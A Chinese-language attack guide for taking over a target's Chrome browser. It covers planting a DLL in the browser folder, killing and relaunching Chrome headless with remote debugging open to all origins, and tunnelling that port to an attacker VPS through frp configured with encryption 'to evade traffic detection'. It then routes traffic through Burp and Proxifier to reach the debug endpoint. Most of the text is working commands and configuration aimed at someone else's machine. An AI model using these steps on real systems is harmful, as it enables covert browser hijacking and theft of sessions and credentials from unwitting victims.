实现方式:
开启远程调试端口
首先将dll插入浏览器目录后,使用命令将对方的远程调试端口开起来
chrome.exe --remote-debugging-port=9222 --remote-allow-origins=* --headless
--remote-debugging-port 指定端口
--remote-allow-origins 避免403
--headless 避免弹窗
注: 如果对方已经开启浏览器需要将浏览器关闭后才能运行插入的dll,关闭浏览器命令taskkill /F /IM chrome.exe /T
开启端后查看端口是否在运行监听netstat -ano | findstr :9222
打隧道
通过frp打通隧道frpc配置
[common]
# 你的 VPS 公网 IP
server_addr = x.x.x.x
server_port = 7000
token = my_secure_token_123
[chrome_debug]
type = tcp
local_ip = 127.0.0.1
# 对应 Chrome 启动时的 --remote-debugging-port
local_port = 9222
# 映射到 VPS 上的端口(确保 VPS 防火墙已开放此端口)
remote_port = 19222
# 【实战建议】开启加密和压缩,躲避流量检测
use_encryption = true
use_compression = true
frps
[common]
# frp 服务监听端口,用于和目标机建立隧道
bind_port = 7000
# 授权令牌,必须与客户端一致(防蹭)
token = my_secure_token_123
# 【可选】开启仪表盘,方便你查看隧道是否在线
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin_password
命令启动.\frpc.exe tcp -s x.x.x.x:7000 -p my_secure_token_123 -l 9222 -r 19222 --uc --ue
配置本地–>burp–>vps–> 目标规则(proxifier)
burp配置上游代理:
打开 Burp,进入 Settings -> Network -> Connections。
找到 Upstream Proxy Servers,点击 Add:
- Destination host:
*(代表所有流量都往 VPS 发) - Proxy host:
你的VPS_IP - Proxy port:
你的VPS代理端口(比如 9000) - Authentication: 如果你的 VPS 代理有账号密码,填在这里。
proxifier配置规则
添加代理服务器:
Profile –> Proxy Servers –> Add。
Address: 127.0.0.1
Port: 8080 (你的 Burp 默认监听端口)
Protocol: HTTPS (注意:Burp 默认模拟的是 HTTPS 代理)。
编辑规则:
| 优先级 | 规则名称 | Applications | Target Hosts | Action |
|---|---|---|---|---|
| 1 (高) | Burp_Exclusion | burp.exe; java.exe | Any | Direct (直连) |
| 2 (中) | Browser_to_Burp | chrome.exe; msedge.exe | 127.0.0.1; localhost | Proxy 127.0.0.1:8080 |
| 3 (低) | Default | Any | Any | Direct |
- 本地访问127.0.0.1:代理端口/json